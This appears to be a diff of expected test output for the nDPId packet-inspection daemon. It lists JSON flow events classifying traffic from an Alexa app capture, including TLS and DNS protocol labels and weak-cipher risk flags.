-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00931{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 